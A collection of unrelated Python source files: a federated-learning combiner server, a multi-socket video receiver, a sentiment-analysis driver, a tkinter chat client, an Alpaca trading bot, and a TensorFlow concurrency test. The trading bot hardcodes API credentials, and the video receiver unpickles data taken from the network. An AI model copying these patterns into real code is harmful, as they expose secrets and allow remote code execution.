announce_client = ConnectorCombiner(host=connect_config['discover_host'],
port=connect_config['discover_port'],
myhost=connect_config['myhost'],
myport=connect_config['myport'],
token=connect_config['token'],
name=connect_config['myname'])
response = None
while True:
status, response = announce_client.announce()
if status == Status.TryAgain:
print(response, flush=True)
time.sleep(5)
continue
if status == Status.Assigned:
config = response
print("COMBINER: was announced successfully. Waiting for clients and commands!", flush=True)
break
if status == Status.UnAuthorized:
print(response, flush=True)
sys.exit("Exiting: Unauthorized")
cert = base64.b64decode(config['certificate']) # .decode('utf-8')
key = base64.b64decode(config['key']) # .decode('utf-8')
grpc_config = {'port': connect_config['myport'],
'secure': connect_config['secure'],
'certificate': cert,
'key': key}
self.repository = S3ModelRepository(config['storage']['storage_config'])
self.server = Server(self, self.modelservice, grpc_config)
from fedn.common.tracer.mongotracer import MongoTracer
self.tracer = MongoTracer(config['statestore']['mongo_config'], config['statestore']['network_id'])
from fedn.clients.combiner.roundcontrol import RoundControl
self.control = RoundControl(self.id, self.repository, self, self.modelservice)
threading.Thread(target=self.control.run, daemon=True).start()
self.server.start()
def __whoami(self, client, instance):
def role_to_proto_role(role):
"""
:param role:
:return:
"""
if role == Role.COMBINER:
return fedn.COMBINER
if role == Role.WORKER:
return fedn.WORKER
if role == Role.REDUCER:
return fedn.REDUCER
if role == Role.OTHER:
return fedn.OTHER
client.name = instance.id
client.role = role_to_proto_role(instance.role)
return client
def get_active_model(self):
"""
:return:
"""
return self.model_id
def set_active_model(self, model_id):
"""
:param model_id:
"""
self.model_id = model_id
def report_status(self, msg, log_level=fedn.Status.INFO, type=None, request=None, flush=True):
print("{}:COMBINER({}):{} {}".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), self.id, log_level, msg), flush=flush)
def request_model_update(self, model_id, clients=[]):
""" Ask clients to update the current global model.
Parameters
----------
model_id : str
The id of the model to be updated.
clients : list
List of clients to submit a model update request to.
An empty list (default) results in a broadcast to
all connected trainig clients.
"""
request = fedn.ModelUpdateRequest()
self.__whoami(request.sender, self)
request.model_id = model_id
request.correlation_id = str(uuid.uuid4())
request.timestamp = str(datetime.now())
if len(clients) == 0:
clients = self.get_active_trainers()
for client in clients:
request.receiver.name = client.name
request.receiver.role = fedn.WORKER
self.SendModelUpdateRequest(request, self)
print("COMBINER: Sent model update request for model {} to clients {}".format(model_id,clients), flush=True)
def request_model_validation(self, model_id, clients=[]):
""" Ask clients to validate the current global model.
Parameters
----------
model_id : str
The id of the model to be updated.
clients : list
List of clients to submit a model update request to.
An empty list (default) results in a broadcast to
all connected trainig clients.
"""
request = fedn.ModelValidationRequest()
self.__whoami(request.sender, self)
request.model_id = model_id
request.correlation_id = str(uuid.uuid4())
request.timestamp = str(datetime.now())
if len(clients) == 0:
clients = self.get_active_validators()
for client in clients:
request.receiver.name = client.name
request.receiver.role = fedn.WORKER
self.SendModelValidationRequest(request, self)
print("COMBINER: Sent validation request for model {} to clients {}".format(model_id,clients), flush=True)
def _list_clients(self, channel):
request = fedn.ListClientsRequest()
self.__whoami(request.sender, self)
request.channel = channel
clients = self.ListActiveClients(request, self)
return clients.client
def get_active_trainers(self):
"""
:return:
"""
trainers = self._list_clients(fedn.Channel.MODEL_UPDATE_REQUESTS)
return trainers
def get_active_validators(self):
"""
:return:
"""
validators = self._list_clients(fedn.Channel.MODEL_VALIDATION_REQUESTS)
return validators
def nr_active_trainers(self):
"""
:return:
"""
return len(self.get_active_trainers())
def nr_active_validators(self):
"""
:return:
"""
return len(self.get_active_validators())
####################################################################################################################
def __join_client(self, client):
""" Add a client to the combiner. """
if not client.name in self.clients.keys():
self.clients[client.name] = {"lastseen": datetime.now()}
def _subscribe_client_to_queue(self, client, queue_name):
self.__join_client(client)
if not queue_name in self.clients[client.name].keys():
self.clients[client.name][queue_name] = queue.Queue()
def __get_queue(self, client, queue_name):
try:
return self.clients[client.name][queue_name]
except KeyError:
raise
def __get_status_queue(self, client):
return self.__get_queue(client, fedn.Channel.STATUS)
def _send_request(self, request, queue_name):
self.__route_request_to_client(request, request.receiver, queue_name)
def _broadcast_request(self, request, queue_name):
""" Publish a request to all subscribed members. """
active_clients = self._list_active_clients()
for client in active_clients:
self.clients[client.name][queue_name].put(request)
def __route_request_to_client(self, request, client, queue_name):
try:
q = self.__get_queue(client, queue_name)
q.put(request)
except:
print("Failed to route request to client: {} {}", request.receiver, queue_name)
raise
def _send_status(self, status):
self.tracer.report(status)
for name, client in self.clients.items():
try:
q = client[fedn.Channel.STATUS]
status.timestamp = str(datetime.now())
q.put(status)
except KeyError:
pass
def __register_heartbeat(self, client):
""" Register a client if first time connecting. Update heartbeat timestamp. """
self.__join_client(client)
self.clients[client.name]["lastseen"] = datetime.now()
#####################################################################################################################
## Control Service
def Start(self, control: fedn.ControlRequest, context):
""" Push a round config to RoundControl.
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
print("\n\n GOT CONTROL **START** from Command {}\n\n".format(control.command), flush=True)
config = {}
for parameter in control.parameter:
config.update({parameter.key: parameter.value})
print("\n\nSTARTING ROUND AT COMBINER WITH ROUND CONFIG: {}\n\n".format(config), flush=True)
job_id = self.control.push_round_config(config)
return response
def Configure(self, control: fedn.ControlRequest, context):
"""
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
for parameter in control.parameter:
setattr(self, parameter.key, parameter.value)
return response
def Stop(self, control: fedn.ControlRequest, context):
"""
:param control:
:param context:
:return:
"""
response = fedn.ControlResponse()
print("\n\n\n\n\n GOT CONTROL **STOP** from Command\n\n\n\n\n", flush=True)
return response
def Report(self, control: fedn.ControlRequest, context):
""" Descibe current state of the Combiner. """
response = fedn.ControlResponse()
print("\n\n\n\n\n GOT CONTROL **REPORT** from Command\n\n\n\n\n", flush=True)
active_trainers = self.get_active_trainers()
p = response.parameter.add()
p.key = "nr_active_trainers"
p.value = str(len(active_trainers))
active_validators = self.get_active_validators()
p = response.parameter.add()
p.key = "nr_active_validators"
p.value = str(len(active_validators))
active_trainers_ = self.get_active_trainers()
active_trainers = []
for client in active_trainers_:
active_trainers.append(client)
p = response.parameter.add()
p.key = "active_trainers"
p.value = str(active_trainers)
active_validators_ = self.get_active_validators()
active_validators = []
for client in active_validators_:
active_validators.append(client)
p = response.parameter.add()
p.key = "active_validators"
p.value = str(active_validators)
p = response.parameter.add()
p.key = "nr_active_clients"
p.value = str(len(active_trainers)+len(active_validators))
p = response.parameter.add()
p.key = "model_id"
model_id = self.get_active_model()
if model_id == None:
model_id = ""
p.value = str(model_id)
p = response.parameter.add()
p.key = "nr_unprocessed_compute_plans"
p.value = str(self.control.round_configs.qsize())
p = response.parameter.add()
p.key = "name"
p.value = str(self.id)
return response
#####################################################################################################################
def AllianceStatusStream(self, response, context):
""" A server stream RPC endpoint that emits status messages. """
status = fedn.Status(status="Client {} connecting to AllianceStatusStream.".format(response.sender))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(response.sender, fedn.Channel.STATUS)
q = self.__get_queue(response.sender, fedn.Channel.STATUS)
self._send_status(status)
while True:
yield q.get()
def SendStatus(self, status: fedn.Status, context):
"""
:param status:
:param context:
:return:
"""
# Add the status message to all subscribers of the status channel
self._send_status(status)
response = fedn.Response()
response.response = "Status received."
return response
def _list_subscribed_clients(self, queue_name):
subscribed_clients = []
for name, client in self.clients.items():
if queue_name in client.keys():
subscribed_clients.append(name)
return subscribed_clients
def _list_active_clients(self, channel):
active_clients = []
for client in self._list_subscribed_clients(channel):
# This can break with different timezones.
now = datetime.now()
then = self.clients[client]["lastseen"]
# TODO: move the heartbeat timeout to config.
if (now - then) < timedelta(seconds=10):
active_clients.append(client)
return active_clients
def _drop_inactive_clients(self):
""" Clean up clients that has missed heartbeat """
def ListActiveClients(self, request: fedn.ListClientsRequest, context):
""" RPC endpoint that returns a ClientList containing the names of all active clients.
An active client has sent a status message / responded to a heartbeat
request in the last 10 seconds.
"""
clients = fedn.ClientList()
active_clients = self._list_active_clients(request.channel)
for client in active_clients:
clients.client.append(fedn.Client(name=client, role=fedn.WORKER))
return clients
def AcceptingClients(self, request: fedn.ConnectionRequest, context):
"""
:param request:
:param context:
:return:
"""
response = fedn.ConnectionResponse()
active_clients = self._list_active_clients(fedn.Channel.MODEL_UPDATE_REQUESTS)
try:
requested = int(self.max_clients)
if len(active_clients) >= requested:
response.status = fedn.ConnectionStatus.NOT_ACCEPTING
return response
if len(active_clients) < requested:
response.status = fedn.ConnectionStatus.ACCEPTING
return response
except Exception as e:
print("Combiner not properly configured! {}".format(e), flush=True)
raise
response.status = fedn.ConnectionStatus.TRY_AGAIN_LATER
return response
def SendHeartbeat(self, heartbeat: fedn.Heartbeat, context):
""" RPC that lets clients send a hearbeat, notifying the server that
the client is available. """
self.__register_heartbeat(heartbeat.sender)
response = fedn.Response()
response.sender.name = heartbeat.sender.name
response.sender.role = heartbeat.sender.role
response.response = "Heartbeat received"
return response
## Combiner Service
def ModelUpdateStream(self, update, context):
"""
:param update:
:param context:
"""
client = update.sender
status = fedn.Status(status="Client {} connecting to ModelUpdateStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_UPDATES)
q = self.__get_queue(client, fedn.Channel.MODEL_UPDATES)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelUpdateRequestStream(self, response, context):
""" A server stream RPC endpoint. Messages from client stream. """
client = response.sender
metadata = context.invocation_metadata()
if metadata:
print("\n\n\nGOT METADATA: {}\n\n\n".format(metadata), flush=True)
status = fedn.Status(status="Client {} connecting to ModelUpdateRequestStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.timestamp = str(datetime.now())
self.__whoami(status.sender, self)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_UPDATE_REQUESTS)
q = self.__get_queue(client, fedn.Channel.MODEL_UPDATE_REQUESTS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelValidationStream(self, update, context):
"""
:param update:
:param context:
"""
client = update.sender
status = fedn.Status(status="Client {} connecting to ModelValidationStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_VALIDATIONS)
q = self.__get_queue(client, fedn.Channel.MODEL_VALIDATIONS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def ModelValidationRequestStream(self, response, context):
""" A server stream RPC endpoint. Messages from client stream. """
client = response.sender
status = fedn.Status(status="Client {} connecting to ModelValidationRequestStream.".format(client.name))
status.log_level = fedn.Status.INFO
status.sender.name = self.id
status.sender.role = role_to_proto_role(self.role)
status.timestamp = str(datetime.now())
self._subscribe_client_to_queue(client, fedn.Channel.MODEL_VALIDATION_REQUESTS)
q = self.__get_queue(client, fedn.Channel.MODEL_VALIDATION_REQUESTS)
self._send_status(status)
while context.is_active():
try:
yield q.get(timeout=1.0)
except queue.Empty:
pass
def SendModelUpdateRequest(self, request, context):
""" Send a model update request. """
self._send_request(request, fedn.Channel.MODEL_UPDATE_REQUESTS)
response = fedn.Response()
response.response = "CONTROLLER RECEIVED ModelUpdateRequest from client {}".format(request.sender.name)
return response # TODO Fill later
def SendModelUpdate(self, request, context):
""" Send a model update response. """
self.control.aggregator.on_model_update(request.model_update_id)
print("ORCHESTRATOR: Received model update", flush=True)
response = fedn.Response()
response.response = "RECEIVED ModelUpdate {} from client {}".format(response, response.sender.name)
return response # TODO Fill later
def SendModelValidationRequest(self, request, context):
""" Send a model update request. """
self._send_request(request, fedn.Channel.MODEL_VALIDATION_REQUESTS)
response = fedn.Response()
response.response = "CONTROLLER RECEIVED ModelValidationRequest from client {}".format(request.sender.name)
return response # TODO Fill later
def SendModelValidation(self, request, context):
""" Send a model update response. """
self.control.aggregator.on_model_validation(request)
print("ORCHESTRATOR received validation ", flush=True)
response = fedn.Response()
response.response = "RECEIVED ModelValidation {} from client {}".format(response, response.sender.name)
return response # TODO Fill later
## Reducer Service
def GetGlobalModel(self, request, context):
"""
:param request:
:param context:
:return:
"""
response = fedn.GetGlobalModelResponse()
self.__whoami(response.sender, self)
response.receiver.name = "reducer"
response.receiver.role = role_to_proto_role(Role.REDUCER)
if not self.get_active_model():
response.model_id = ''
else:
response.model_id = self.get_active_model()
return response
####################################################################################################################
def run(self):
"""
"""
import signal
print("COMBINER: {} started, ready for requests. ".format(self.id), flush=True)
try:
while True:
signal.pause()
except (KeyboardInterrupt, SystemExit):
pass
self.server.stop()
|
receive_video.py
|
import base64
from root import *
import cv2
import time
import pickle
from datetime import datetime
import redis
video_buffer = [b""]
video_buffer_lock = []
frame_size = [-1]
frame_size_lock = []
tmp_frame_size = [[]] # to be used when the frame size is changed in the receiver thread but not in the display thread
tmp_frame_size_lock = []
parallel_connections = 20
buffer_ready = False
def init_locks_and_buffers(number_of_connections):
global video_buffer, video_buffer_lock, frame_size, frame_size_lock, tmp_frame_size, tmp_frame_size_lock
video_buffer = []
frame_size = []
tmp_frame_size = []
video_buffer_lock = []
frame_size_lock = []
tmp_frame_size_lock = []
for i in range(number_of_connections):
video_buffer.append(b"")
frame_size.append(-1)
tmp_frame_size.append([])
video_buffer_lock.append(threading.Lock())
frame_size_lock.append(threading.Lock())
tmp_frame_size_lock.append(threading.Lock())
global buffer_ready
buffer_ready = True
def new_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
port = 12345
s.connect((ip, port))
return s
def receive_frames(s: socket.socket, connection_id, r: redis.Redis):
size = s.recv(1024)
global frame_size
frame_size[connection_id] = int(size.decode('utf-8'))
print('Video receiver : Frame size in bytes : ' + str(frame_size[connection_id]))
total_received_bytes = 0
while True:
global video_buffer
status = r.get("status").decode("utf-8")
if status != "call":
s.shutdown(socket.SHUT_RDWR)
s.close()
break
packet = s.recv(4096)
# todo solve the case when we are waiting for a packet (server should send "BYE")
if not packet:
print("Video receiver : No packet received !!!! Exiting the child video receiving thread.")
break
total_received_bytes += len(packet)
# This part is synchronized with the video server (every 25 frames)
# todo consider that the latency is actually way bigger for a frame because it has many packets
# todo fix the problem when the hosts don't have the same timezone
# todo what if this is exactly the size of 25 frames?
if total_received_bytes > 25 * frame_size[connection_id]:
packet_end = packet[len(packet) - 53:]
# print("Video receiver : Received packet seems to be the server time.")
# print("Video receiver : Datetime packet length : " + str(len(packet_end)))
sending_time = pickle.loads(packet_end)
# print("Video receiver : Received server time.")
delta = datetime.now() - sending_time
latency = abs(delta.total_seconds()) # todo check that the negative values are not actually a problem
# frame_latency = latency * (frame_size[connection_id] / 4096)
# print("Video receiver : Current packet latency : " + str(latency))
# print("Video receiver : Estimated video latency : " + str(frame_latency))
s.sendall(pickle.dumps(latency)) # todo make sure this is the most efficient way to sync
new_frame_size = s.recv(4096) # todo make sure it will only receive the new frame size
new_frame_size = int(new_frame_size.decode('utf-8'))
# print("Video receiver : Frame size changed by server to " + str(new_frame_size))
global tmp_frame_size
tmp_frame_size_lock[connection_id].acquire()
tmp_frame_size[connection_id].append(new_frame_size) # tmp_frame_size now has the changes of frame size in order.
tmp_frame_size_lock[connection_id].release()
buffer_string = "NEW_FRAME_SIZE"
packet = packet[:len(packet) - 53]
video_buffer_lock[connection_id].acquire()
video_buffer[connection_id] += packet
video_buffer[connection_id] += bytes(buffer_string, 'utf-8')
video_buffer_lock[connection_id].release()
total_received_bytes = 0
s.sendall(b"OK") # Send ACK
time.sleep(0.001)
continue
video_buffer_lock[connection_id].acquire()
try:
video_buffer[connection_id] += packet
except IndexError as e:
print("Exception" + str(e))
print("ID : " + str(connection_id))
print("Video buffer size : " + str(len(video_buffer)))
video_buffer_lock[connection_id].release()
time.sleep(0.001)
print('Video receiver : Exiting child video receiving thread.')
# s.close()
class ReceiveFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, correspondent_ip, r):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.correspondent_ip = correspondent_ip
self.r = r
def run(self):
init_locks_and_buffers(parallel_connections)
print("After buffer init : \n")
print(video_buffer)
connection_threads = []
for i in range(parallel_connections):
s = new_connection(self.correspondent_ip)
new_thread = threading.Thread(target=receive_frames, args=(s, i, self.r,))
new_thread.start()
print("Video receiver : Child thread started.")
connection_threads.append(new_thread)
# Join the threads
for th in connection_threads:
th.join()
print("Exiting the main video receiver thread.")
class DisplayFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.r = r
def run(self) -> None:
print("Displaying frame thread started")
# This is to make sure buffers are initialized before reading frames
while not buffer_ready:
time.sleep(0.05)
global video_buffer
global frame_size
while 1:
status = self.r.get("status").decode('utf-8')
if status == "quit":
break
show_video = self.r.get("show_video").decode("utf-8")
if show_video == "FALSE":
# todo make this display a profile image
self.r.set("other_webcam", "")
for i in range(parallel_connections):
video_buffer_lock[i].acquire()
video_buffer[i] = b""
video_buffer_lock[i].release()
continue
for i in range(parallel_connections):
if len(video_buffer[i]) < len(bytes("NEW_FRAME_SIZE", 'utf-8')):
continue
video_buffer_lock[i].acquire()
start = video_buffer[i][:len(bytes("NEW_FRAME_SIZE", 'utf-8'))]
video_buffer_lock[i].release()
valid_string = True
try:
start = start.decode('utf-8')
except UnicodeDecodeError:
valid_string = False
if valid_string and start == "NEW_FRAME_SIZE":
# print("Video player : Changing frame size.")
video_buffer_lock[i].acquire()
video_buffer[i] = video_buffer[i][len(bytes("NEW_FRAME_SIZE", 'utf-8')):]
video_buffer_lock[i].release()
# global frame_size
global tmp_frame_size # todo check if I need a lock here
tmp_frame_size_lock[i].acquire()
frame_size[i] = tmp_frame_size[i][0]
tmp_frame_size[i] = tmp_frame_size[i][1:]
tmp_frame_size_lock[i].release()
continue
if len(video_buffer[i]) == 0 or frame_size[i] == -1 or len(video_buffer[i]) < frame_size[i]:
time.sleep(0.001)
continue
# If there is more than 1 second of video in the buffer, skip it (assuming 25 fps)
# todo see if this is actually useful, because the buffer itself is not the bottleneck
if len(video_buffer[i]) > frame_size[i] * 25:
video_buffer_lock[i].acquire()
video_buffer[i] = b""
print("Video player : Too many frames in the buffer, clearing buffer.")
video_buffer_lock[i].release()
continue
video_buffer_lock[i].acquire()
next_frame = video_buffer[i][:frame_size[i]]
video_buffer[i] = video_buffer[i][frame_size[i]:]
video_buffer_lock[i].release()
frame = pickle.loads(next_frame)
# Send the frame to Redis
success, encoded_image = cv2.imencode('.jpg', frame) # encode in jpg
content = encoded_image.tobytes() # convert to bytes
frame_base64 = base64.b64encode(content).decode('ascii') # base 64 ascii
self.r.set("other_webcam", frame_base64)
# Old way of displaying (keep while developing)
# cv2.namedWindow('frame', cv2.WND_PROP_FULLSCREEN)
# cv2.imshow('frame', frame)
# cv2.waitKey(1)
print("Exiting video playing thread.")
|
main.py
|
from xml_to_json import process_posts
from preprocessing import preprocess_text
from post_stats import generate_stats
from post_freqdist import generate_freqdist
from post_sentiment_analysis import sentiment_analysis
import json
import multiprocessing
def save_freqdist_to_file(input_path, output_path):
freq_per_year = generate_freqdist(input_path, filtertag1="c#", filtertag2="java")
with open(output_path, "w") as output_file:
json.dump(list(freq_per_year.values())[0], output_file)
def save_sentiment_analysis_to_file(input_path, output_path, year):
sentiment_analysis_result = sentiment_analysis(input_path, year, filtertag1="c#", filtertag2="java")
with open(output_path, "w") as output_file:
json.dump(sentiment_analysis_result, output_file)
def save_post_stats_to_file(input_path, output_path):
stats_per_year = generate_stats(input_path, filtertag1="c#", filtertag2="java")
data = {
"c#": list(stats_per_year.values())[0]["c#"].__dict__,
"java": list(stats_per_year.values())[0]["java"].__dict__
}
with open(output_path, "w") as output_file:
json.dump(data, output_file)
def main():
# Example usage: Saving sentiment analysis results to a json file
input_paths = {
'2015': "Your/Posts Data/Path/Posts2015.xml",
'2016': "Your/Posts Data/Path/Posts2016.xml",
'2017': "Your/Posts Data/Path/Posts2017.xml",
'2018': "Your/Posts Data/Path/Posts2018.xml",
'2019': "Your/Posts Data/Path/Posts2019.xml"
}
output_paths = {
'2015': "Your/Output Data/Path/SentimentAnalysis2015.json",
'2016': "Your/Output Data/Path/SentimentAnalysis2016.json",
'2017': "Your/Output Data/Path/SentimentAnalysis2017.json",
'2018': "Your/Output Data/Path/SentimentAnalysis2018.json",
'2019': "Your/Output Data/Path/SentimentAnalysis2019.json"
}
sentiment_analysis2015 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2015'], output_paths['2015'], '2015'))
sentiment_analysis2016 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2016'], output_paths['2016'], '2016'))
sentiment_analysis2017 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2017'], output_paths['2017'], '2017'))
sentiment_analysis2018 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2018'], output_paths['2018'], '2018'))
sentiment_analysis2019 = multiprocessing.Process(target=save_sentiment_analysis_to_file, args=(input_paths['2019'], output_paths['2019'], '2019'))
sentiment_analysis2015.start()
sentiment_analysis2016.start()
sentiment_analysis2017.start()
sentiment_analysis2018.start()
sentiment_analysis2019.start()
sentiment_analysis2015.join()
sentiment_analysis2016.join()
sentiment_analysis2017.join()
sentiment_analysis2018.join()
sentiment_analysis2019.join()
print('end')
if __name__=="__main__":
main()
|
node.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = "127.0.0.1"
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
strategy.py
|
# Importing various modules
import threading
import os
import abc
import time
import yfinance as yf
from alpaca_trade_api import REST
import pandas as pd
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from keras.layers import Dense
from keras.models import Sequential, model_from_json
# AlpacaPaperSocket class for the connection to Alpaca API using paper trading key_id, secret_id & base_url
class AlpacaPaperSocket(REST):
def __init__(self):
super().__init__(
key_id = 'PKARJ9A9ZP1H8K5A58TF',
secret_key = '68Bl3zDxWDGGT1l30y*******NdwtEEe6nRAxAzW',
base_url = 'https://paper-api.alpaca.markets'
)
# TradingSystem class with methods declared as abstract, so that we can change our implemetations according to the need of the system computations
class TradingSystem(abc.ABC):
def __init__(self, api, symbol, time_frame, system_id, system_label):
self.api = api
self.symbol = symbol
self.time_frame = time_frame
self.system_id = system_id
self.system_label = system_label
thread = threading.Thread(target = self.system_loop)
thread.start()
@abc.abstractmethod
def place_buy_order(self):
pass
@abc.abstractmethod
def place_sell_order(self):
pass
@abc.abstractmethod
def system_loop(self):
pass
# AI Porfolio Management Model class which implements our AI model
class PMDevelopment:
def __init__(self):
data = pd.read_csv("stock_data.csv")
# Seperating the Dependent & the Independent Model
x = data['Delta Value']
y = data.drop(['Delta Value'], axis = 1)
# Splitting the Train & Test DataSet
x_train, x_test, y_train, y_test = train_test_split(x, y)
# Creating a Sequential Model
network = Sequential()
# Creating the Structure to our Neural network
network.add(Dense(1, input_shape = (1,), activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
#network.add(Dense(5, activation = 'tanh'))
#network.add(Dense(3, activation = 'tanh'))
network.add(Dense(3, activation = 'tanh'))
network.add(Dense(1, activation = 'tanh'))
#Compiling the network using rmsprop optimizer. We can also use Adam Optimizer
network.compile(optimizer = 'rmsprop', loss = 'hinge', metrics = ['accuracy'])
#Fitting(Training) the model to predict the Accuracy
network.fit(x_train.values, y_train.values, epochs = 100)
#Evaluaing our model predictions
y_pred = network.predict(x_test.values)
y_pred = np.around(y_pred, 0)
print(classification_report(y_test, y_pred))
#Saving the structure to our json
strategy_model = network.to_json()
with open("model.json", "w") as json_file:
json_file.write(strategy_model)
#Saving our network weights to the HDF5
network.save_weights("result.h5")
#PMDevelopment()
# Portfolio Management Model class
class PortfolioMgmtModel:
def __init__(self):
data = pd.read_csv("stock_data.csv")
x = data['Delta Value']
y = data.drop(['Delta Value'], axis = 1)
# Reading Structure from Json
json_file = open("model.json", "r")
json = json_file.read()
json_file.close()
self.network = model_from_json(json)
# Reading weights from HDF5
self.network.load_weights("result.h5")
# Verifying weights & structure are loaded
y_pred = self.network.predict(x.values)
y_pred = np.around(y_pred, 0)
print(classification_report(y, y_pred))
PortfolioMgmtModel()
# Portfolio ManagementSystem class where a vector is created for storing data
class PortfolioMgmtSystem(TradingSystem):
def __init__(self):
super().__init__(AlpacaPaperSocket(), 'IBM', 86400, 1, 'AI_PM')
self.AI = PortfolioMgmtModel()
# function for placing a buy order
def place_buy_order(self):
self.api.submit_order(
symbol = 'IBM',
qty = 1,
side = 'buy',
type = 'market',
time_in_force = 'day'
)
# function for placing a sell order
def place_sell_order(self):
self.api.submit_order(
symbol = 'IBM',
qty = 1,
side = 'sell',
type = 'market',
time_in_force = 'day'
)
# An infinite loop which will systematically make the trades
def system_loop(self):
this_week_close = 0
last_week_close = 0
delta = 0
day_cnt = 0
while(True):
# Waiting a day fro requesting more data
time.sleep(1440)
# Requesting EOD from IBM
data_req = self.api.get_barset('IBM', timeframe = '1D', limit = 1).df
# Creating the dataframe to predict
z = pd.DataFrame(
data = [[data_req['IBM']['close'][0]]], columns = 'Close'.split()
)
if(day_cnt == 7):
day_cnt = 0
last_week_close = this_week_close
this_week_close = z['Close']
delta = this_week_close - last_week_close
# AI will choose whether to Buy, Sell or Hold Stock
if(np.around(self.AI.network.predict([delta])) <= -0.5):
self.place_sell_order()
elif(np.around(self.AI.network.predict([delta])) >= 0.5):
self.place_buy_order()
PortfolioMgmtSystem()
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.test_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
variables.global_variables_initializer().run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.test_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.mul(ones_t, float(i)), False)
for i in range(1, 21)
]
variables.global_variables_initializer().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
if __name__ == "__main__":
test.main()
|
generate_msgs.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generates random ROS messages and publishes them to live topics.
Usage:
generate_msgs.py [TYPE [TYPE ...]]
[--no-type TYPE [TYPE ...]]
[--max-count NUM]
[--max-per-topic NUM]
[--max-topics NUM]
[--topics-per-type NUM]
[--interval SECONDS]
[--publish-prefix PREFIX]
